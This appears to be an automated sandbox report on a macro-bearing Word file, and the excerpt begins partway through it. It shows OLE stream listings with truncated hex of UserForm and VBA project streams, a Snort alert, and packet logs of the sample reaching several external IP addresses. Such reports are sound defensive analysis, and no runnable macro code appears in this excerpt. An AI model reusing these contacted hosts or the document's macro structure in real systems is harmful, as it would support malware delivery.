                                                                                                                        Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } P k e b r _ y 5 x j d 5 h l 0 7 0 . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 3 1 6 5 . . C l i e n t L e f t = 4 5 . . C l i e n t T o p = 3 9 0 . . C l i e n t W i d t h = 4 7 1 0 . . S t a r t U p P o s i t i o n = 1 ' C
                                                                                                                        Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 50 6b 65 62 72 5f 79 35 78 6a 64 35 68 6c 30 37 30 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67
                                                                                                                        Stream Path: Macros/Pkebr_y5xjd5hl070/f, File Type: data, Stream Size: 38
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Pkebr_y5xjd5hl070/f
                                                                                                                        File Type:data
                                                                                                                        Stream Size:38
                                                                                                                        Entropy:1.54052096453
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:. . . . . . . . . } . . t . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                        Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 74 20 00 00 cf 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                        Stream Path: Macros/Pkebr_y5xjd5hl070/o, File Type: empty, Stream Size: 0
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Pkebr_y5xjd5hl070/o
                                                                                                                        File Type:empty
                                                                                                                        Stream Size:0
                                                                                                                        Entropy:0.0
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:
                                                                                                                        Data Raw:
                                                                                                                        Stream Path: Macros/Seby_rq4k8mp/\x1CompObj, File Type: data, Stream Size: 97
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Seby_rq4k8mp/\x1CompObj
                                                                                                                        File Type:data
                                                                                                                        Stream Size:97
                                                                                                                        Entropy:3.61064918306
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                                                                                                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                        Stream Path: Macros/Seby_rq4k8mp/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 268
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Seby_rq4k8mp/\x3VBFrame
                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                        Stream Size:268
                                                                                                                        Entropy:4.71722873732
                                                                                                                        Base64 Encoded:True
                                                                                                                        Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } S e b y _ r q 4 k 8 m p . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 3 1 6 5 . . C l i e n t L e f t = 4 5 . . C l i e n t T o p = 3 9 0 . . C l i e n t W i d t h = 4 7 1 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r
                                                                                                                        Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 53 65 62 79 5f 72 71 34 6b 38 6d 70 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20
                                                                                                                        Stream Path: Macros/Seby_rq4k8mp/f, File Type: data, Stream Size: 38
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Seby_rq4k8mp/f
                                                                                                                        File Type:data
                                                                                                                        Stream Size:38
                                                                                                                        Entropy:1.54052096453
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:. . . . . . . . . } . . t . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                        Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 74 20 00 00 cf 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                        Stream Path: Macros/Seby_rq4k8mp/o, File Type: empty, Stream Size: 0
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Seby_rq4k8mp/o
                                                                                                                        File Type:empty
                                                                                                                        Stream Size:0
                                                                                                                        Entropy:0.0
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:
                                                                                                                        Data Raw:
                                                                                                                        Stream Path: Macros/U2v6aydkxz3/\x1CompObj, File Type: data, Stream Size: 97
                                                                                                                        General
                                                                                                                        Stream Path:Macros/U2v6aydkxz3/\x1CompObj
                                                                                                                        File Type:data
                                                                                                                        Stream Size:97
                                                                                                                        Entropy:3.61064918306
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                                                                                                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                        Stream Path: Macros/U2v6aydkxz3/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 267
                                                                                                                        General
                                                                                                                        Stream Path:Macros/U2v6aydkxz3/\x3VBFrame
                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                        Stream Size:267
                                                                                                                        Entropy:4.72118950953
                                                                                                                        Base64 Encoded:True
                                                                                                                        Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U 2 v 6 a y d k x z 3 . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 3 1 6 5 . . C l i e n t L e f t = 4 5 . . C l i e n t T o p = 3 9 0 . . C l i e n t W i d t h = 4 7 1 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O
                                                                                                                        Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 32 76 36 61 79 64 6b 78 7a 33 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20
                                                                                                                        Stream Path: Macros/U2v6aydkxz3/f, File Type: data, Stream Size: 38
                                                                                                                        General
                                                                                                                        Stream Path:Macros/U2v6aydkxz3/f
                                                                                                                        File Type:data
                                                                                                                        Stream Size:38
                                                                                                                        Entropy:1.54052096453
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:. . . . . . . . . } . . t . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                        Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 74 20 00 00 cf 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                        Stream Path: Macros/U2v6aydkxz3/o, File Type: empty, Stream Size: 0
                                                                                                                        General
                                                                                                                        Stream Path:Macros/U2v6aydkxz3/o
                                                                                                                        File Type:empty
                                                                                                                        Stream Size:0
                                                                                                                        Entropy:0.0
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:
                                                                                                                        Data Raw:
                                                                                                                        Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 7343
                                                                                                                        General
                                                                                                                        Stream Path:Macros/VBA/_VBA_PROJECT
                                                                                                                        File Type:data
                                                                                                                        Stream Size:7343
                                                                                                                        Entropy:5.44101932672
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
                                                                                                                        Data Raw:cc 61 85 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 06 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                                                                                                        Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 1429
                                                                                                                        General
                                                                                                                        Stream Path:Macros/VBA/dir
                                                                                                                        File Type:data
                                                                                                                        Stream Size:1429
                                                                                                                        Entropy:6.86901589365
                                                                                                                        Base64 Encoded:True
                                                                                                                        Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . _ _ Q . 0 . . @ . . . . . = . . . . . ` . . . . . . . . . . . . a . . . . J . < . . . . . r s t d . o l e > . 2 s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s W O W 6 . 4 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . . N o r m a l . . E N . C r . m . a Q . F . . . . . . . * , \\ C . . . . . . m . . A . ! O f f i c .
                                                                                                                        Data Raw:01 91 b5 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 84 5f 5f 51 00 30 00 00 40 02 14 06 02 14 3d ad 02 14 07 02 60 01 14 08 06 12 09 02 12 80 e1 f1 d1 61 06 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 32 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30 30 32 30 b0 34 33 30 2d 00
                                                                                                                        Stream Path: Macros/Y6lmxng9ukvy69c/\x1CompObj, File Type: data, Stream Size: 97
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Y6lmxng9ukvy69c/\x1CompObj
                                                                                                                        File Type:data
                                                                                                                        Stream Size:97
                                                                                                                        Entropy:3.61064918306
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                                                                                                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                        Stream Path: Macros/Y6lmxng9ukvy69c/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 271
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Y6lmxng9ukvy69c/\x3VBFrame
                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                        Stream Size:271
                                                                                                                        Entropy:4.74916908167
                                                                                                                        Base64 Encoded:True
                                                                                                                        Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } Y 6 l m x n g 9 u k v y 6 9 c . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 3 1 6 5 . . C l i e n t L e f t = 4 5 . . C l i e n t T o p = 3 9 0 . . C l i e n t W i d t h = 4 7 1 0 . . S t a r t U p P o s i t i o n = 1 ' C e n
                                                                                                                        Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 59 36 6c 6d 78 6e 67 39 75 6b 76 79 36 39 63 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74
                                                                                                                        Stream Path: Macros/Y6lmxng9ukvy69c/f, File Type: data, Stream Size: 38
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Y6lmxng9ukvy69c/f
                                                                                                                        File Type:data
                                                                                                                        Stream Size:38
                                                                                                                        Entropy:1.54052096453
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:. . . . . . . . . } . . t . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                        Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 74 20 00 00 cf 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                        Stream Path: Macros/Y6lmxng9ukvy69c/o, File Type: empty, Stream Size: 0
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Y6lmxng9ukvy69c/o
                                                                                                                        File Type:empty
                                                                                                                        Stream Size:0
                                                                                                                        Entropy:0.0
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:
                                                                                                                        Data Raw:
                                                                                                                        Stream Path: Macros/Z4lx7rwdfqe/\x1CompObj, File Type: data, Stream Size: 97
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Z4lx7rwdfqe/\x1CompObj
                                                                                                                        File Type:data
                                                                                                                        Stream Size:97
                                                                                                                        Entropy:3.61064918306
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                                                                                                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                        Stream Path: Macros/Z4lx7rwdfqe/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 267
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Z4lx7rwdfqe/\x3VBFrame
                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                        Stream Size:267
                                                                                                                        Entropy:4.687609726
                                                                                                                        Base64 Encoded:True
                                                                                                                        Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } Z 4 l x 7 r w d f q e . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 3 1 6 5 . . C l i e n t L e f t = 4 5 . . C l i e n t T o p = 3 9 0 . . C l i e n t W i d t h = 4 7 1 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O
                                                                                                                        Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 5a 34 6c 78 37 72 77 64 66 71 65 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20
                                                                                                                        Stream Path: Macros/Z4lx7rwdfqe/f, File Type: data, Stream Size: 38
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Z4lx7rwdfqe/f
                                                                                                                        File Type:data
                                                                                                                        Stream Size:38
                                                                                                                        Entropy:1.54052096453
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:. . . . . . . . . } . . t . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                        Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 74 20 00 00 cf 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                        Stream Path: Macros/Z4lx7rwdfqe/o, File Type: empty, Stream Size: 0
                                                                                                                        General
                                                                                                                        Stream Path:Macros/Z4lx7rwdfqe/o
                                                                                                                        File Type:empty
                                                                                                                        Stream Size:0
                                                                                                                        Entropy:0.0
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:
                                                                                                                        Data Raw:
                                                                                                                        Stream Path: WordDocument, File Type: data, Stream Size: 32814
                                                                                                                        General
                                                                                                                        Stream Path:WordDocument
                                                                                                                        File Type:data
                                                                                                                        Stream Size:32814
                                                                                                                        Entropy:3.80167925486
                                                                                                                        Base64 Encoded:False
                                                                                                                        Data ASCII:. . . . [ . . . . . . . . . . . . . . . . . . . . . . . . { . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 . . . . . . . 2 . . . u . . . . . . . u . . . . . . . u . . . . . . . u . . . . . . . u . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                        Data Raw:ec a5 c1 00 5b 80 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 b4 7b 00 00 0e 00 62 6a 62 6a ac fa ac fa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e 80 00 00 ce 90 01 00 ce 90 01 00 b4 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

                                                                                                                        Network Behavior

                                                                                                                        Snort IDS Alerts

Timestamp                  | Protocol | SID  | Message                          | Source Port | Dest Port | Source IP     | Dest IP
03/16/21-14:20:53.246460   | TCP      | 1201 | ATTACK-RESPONSES 403 Forbidden   | 80          | 49175     | 185.104.45.33 | 192.168.2.22

                                                                                                                        Network Port Distribution

                                                                                                                        TCP Packets

Timestamp                            | Source Port | Dest Port | Source IP     | Dest IP
Mar 16, 2021 14:27:10.592955112 CET  | 49720       | 80        | 192.168.2.5   | 185.104.45.33
Mar 16, 2021 14:27:10.659269094 CET  | 80          | 49720     | 185.104.45.33 | 192.168.2.5
Mar 16, 2021 14:27:10.659401894 CET  | 49720       | 80        | 192.168.2.5   | 185.104.45.33
Mar 16, 2021 14:27:10.660463095 CET  | 49720       | 80        | 192.168.2.5   | 185.104.45.33
Mar 16, 2021 14:27:10.726577997 CET  | 80          | 49720     | 185.104.45.33 | 192.168.2.5
Mar 16, 2021 14:27:10.732536077 CET  | 80          | 49720     | 185.104.45.33 | 192.168.2.5
Mar 16, 2021 14:27:10.732588053 CET  | 80          | 49720     | 185.104.45.33 | 192.168.2.5
Mar 16, 2021 14:27:10.732660055 CET  | 49720       | 80        | 192.168.2.5   | 185.104.45.33
Mar 16, 2021 14:27:11.291416883 CET  | 49721       | 443       | 192.168.2.5   | 103.28.39.103
Mar 16, 2021 14:27:11.523667097 CET  | 443         | 49721     | 103.28.39.103 | 192.168.2.5
Mar 16, 2021 14:27:11.523818970 CET  | 49721       | 443       | 192.168.2.5   | 103.28.39.103
Mar 16, 2021 14:27:11.547408104 CET  | 49721       | 443       | 192.168.2.5   | 103.28.39.103
Mar 16, 2021 14:27:11.790451050 CET  | 443         | 49721     | 103.28.39.103 | 192.168.2.5
Mar 16, 2021 14:27:11.790522099 CET  | 443         | 49721     | 103.28.39.103 | 192.168.2.5
Mar 16, 2021 14:27:11.790568113 CET  | 443         | 49721     | 103.28.39.103 | 192.168.2.5
Mar 16, 2021 14:27:11.790669918 CET  | 49721       | 443       | 192.168.2.5   | 103.28.39.103
Mar 16, 2021 14:27:11.795928001 CET  | 49721       | 443       | 192.168.2.5   | 103.28.39.103
Mar 16, 2021 14:27:12.030214071 CET  | 443         | 49721     | 103.28.39.103 | 192.168.2.5
Mar 16, 2021 14:27:12.055788040 CET  | 49721       | 443       | 192.168.2.5   | 103.28.39.103
Mar 16, 2021 14:27:12.338952065 CET  | 443         | 49721     | 103.28.39.103 | 192.168.2.5
Mar 16, 2021 14:27:12.550766945 CET  | 443         | 49721     | 103.28.39.103 | 192.168.2.5
Mar 16, 2021 14:27:12.550801992 CET  | 443         | 49721     | 103.28.39.103 | 192.168.2.5
Mar 16, 2021 14:27:12.550822020 CET  | 443         | 49721     | 103.28.39.103 | 192.168.2.5
Mar 16, 2021 14:27:12.550844908 CET  | 443         | 49721     | 103.28.39.103 | 192.168.2.5
Mar 16, 2021 14:27:12.550869942 CET  | 443         | 49721     | 103.28.39.103 | 192.168.2.5
Mar 16, 2021 14:27:12.550894022 CET  | 443         | 49721     | 103.28.39.103 | 192.168.2.5
Mar 16, 2021 14:27:12.550900936 CET  | 49721       | 443       | 192.168.2.5   | 103.28.39.103
                                                                                                                        Mar 16, 2021 14:27:12.550910950 CET44349721103.28.39.103192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:12.550932884 CET49721443192.168.2.5103.28.39.103
                                                                                                                        Mar 16, 2021 14:27:12.550982952 CET49721443192.168.2.5103.28.39.103
                                                                                                                        Mar 16, 2021 14:27:12.784440994 CET44349721103.28.39.103192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:12.784487009 CET44349721103.28.39.103192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:12.784514904 CET44349721103.28.39.103192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:12.784538984 CET44349721103.28.39.103192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:12.784601927 CET49721443192.168.2.5103.28.39.103
                                                                                                                        Mar 16, 2021 14:27:12.784652948 CET49721443192.168.2.5103.28.39.103
                                                                                                                        Mar 16, 2021 14:27:12.863569975 CET49722443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:12.994874954 CET44349722107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:12.995023012 CET49722443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:12.995368004 CET49722443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:13.129111052 CET44349722107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:13.132900953 CET44349722107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:13.132968903 CET44349722107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:13.133013010 CET44349722107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:13.133073092 CET49722443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:13.163969040 CET49722443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:13.295587063 CET44349722107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:13.302031994 CET49722443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:13.473725080 CET44349722107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:13.524260998 CET44349722107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:13.586406946 CET49722443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:13.658648968 CET49723443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:13.790016890 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:13.790157080 CET49723443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:13.790486097 CET49723443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:13.923022985 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:13.926629066 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:13.926655054 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:13.926667929 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:13.926764011 CET49723443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:13.928303003 CET49723443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:14.063785076 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.064877987 CET49723443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:14.238434076 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.330480099 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.330511093 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.330527067 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.330547094 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.330565929 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.330581903 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.330596924 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.330612898 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.330620050 CET49723443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:14.330629110 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.330650091 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.330681086 CET49723443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:14.330705881 CET49723443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:14.461632967 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.461657047 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.461674929 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.461690903 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.461707115 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.461726904 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.461770058 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.461811066 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.461828947 CET44349723107.180.2.185192.168.2.5
                                                                                                                        Mar 16, 2021 14:27:14.461894035 CET49723443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:14.461982965 CET49723443192.168.2.5107.180.2.185
                                                                                                                        Mar 16, 2021 14:27:14.461993933 CET44349723107.180.2.185192.168.2.5
